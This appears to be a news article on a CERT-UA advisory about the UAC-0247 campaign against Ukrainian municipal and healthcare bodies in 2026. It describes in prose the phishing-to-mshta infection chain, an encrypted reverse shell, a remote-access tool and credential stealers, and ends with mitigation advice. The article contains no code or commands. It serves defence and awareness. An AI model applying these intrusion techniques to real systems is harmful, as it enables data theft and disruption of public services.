Surge of Cyberattacks Targeting Local Governments and Healthcare Institutions
In recent weeks, a significant uptick in cyberattacks has been reported against local governments and municipal healthcare institutions, particularly clinical and ambulance hospitals. This alarming trend highlights the persistent threat posed by cybercriminals, who are increasingly focusing their efforts on vital public services that often lack robust cybersecurity defenses.
The latest attacks are attributed to a notorious threat cluster identified as UAC-0247. This group is known for its advanced techniques in data theft, persistence, and lateral movement within networks, raising concerns among cybersecurity experts and government officials alike. The ramifications of these attacks can be severe, endangering sensitive personal data and disrupting essential services.
The Mechanics of the Attack Chain
The attack chain employed by UAC-0247 begins with well-crafted phishing emails that deceptively portray discussions surrounding humanitarian aid proposals. These emails often contain links directing the recipients to malicious web resources. In a troubling trend, threat actors have been known to create entire fake nonprofit websites using artificial intelligence. Furthermore, they sometimes exploit legitimate yet vulnerable sites through cross-site scripting (XSS) vulnerabilities to host malicious code.
Ukraine’s national Computer Emergency Response Team (CERT-UA) has reported a surge in these targeted cyberattacks occurring between March and April 2026. Such sophisticated tactics pose high risks, particularly to organizations that may not have stringent cybersecurity protocols in place.
When victims unwittingly click the phony links in the phishing emails, they unknowingly download an archive file containing a shortcut (.LNK) file. Opening this file triggers the mshta.exe utility, a Windows feature that processes an HTA (HTML Application) script. This script not only retrieves and executes remote content but also displays a decoy form to mislead the user while deploying a malicious executable (.EXE) payload silently through a scheduled task.
Deployment of Encrypted Reverse Shells
Recent investigations into these cyber incidents have revealed the utilization of a sophisticated two-stage loader. The second stage employs a proprietary executable format capable of supporting custom code sections, dynamic imports, and relocatable code. This meticulous design allows the final payload — highly compressed and encrypted — to establish a TCP reverse shell known as RAVENSHELL.
Once activated, this reverse shell communicates back to the attackers’ command server, encrypting its traffic using a 9-byte XOR key. The initial communication is often simply an indication of successful connection, quickly followed by an array of commands executed through CMD.
Once the attackers establish a foothold within the victim’s system, they deploy a remote administration tool known as AGINGFLY, built using C#. This tool provides the attackers with full control over the infected host, enabling various functionalities such as command execution, file transfers, screenshot capturing, keylogging, and arbitrary code execution through encrypted web socket communications.
One of the distinguishing features of AGINGFLY is its dynamic command system. This component allows command handlers to be downloaded as source code from the command server and compiled in real-time, thus making the malware even harder to detect.
Techniques for Data Theft
For data exfiltration, the attackers utilize two specialized tools: CHROMELEVATOR and ZAPIXDESK. CHROMELEVATOR extracts stored browser credentials and cookies, while ZAPIXDESK is used to harvest WhatsApp data directly from desktop applications. Analysis of compromised systems has illustrated that attackers utilize both custom subnet scanners and public tools such as RUSTSCAN for reconnaissance and lateral movement.
In alarming scenarios, investigators discovered an XMRIG cryptocurrency miner stealthily running as a DLL, loaded through a compromised version of the WIREGUARD VPN client. This highlights the escalating creativity and resourcefulness of the attackers.
Recommendations for Mitigation
In light of these attacks, CERT-UA has issued an advisory urging organizations to implement stricter controls over the execution of file types such as LNK, HTA, and JS files. Moreover, it is advisable to limit the use of scripting and administrative utilities, including mshta.exe, powershell.exe, and wscript.exe. Implementing these measures can significantly reduce vulnerability to the evolving threats associated with the UAC-0247 cluster, a persistent threat actively targeting critical healthcare and government infrastructure across Ukraine.
As cyber threats continue to escalate, it is imperative for local governments and healthcare institutions to bolster their cybersecurity defenses, safeguarding sensitive data and ensuring the continuity of essential services. The need for vigilance and proactive measures has never been more urgent in an increasingly interconnected digital landscape.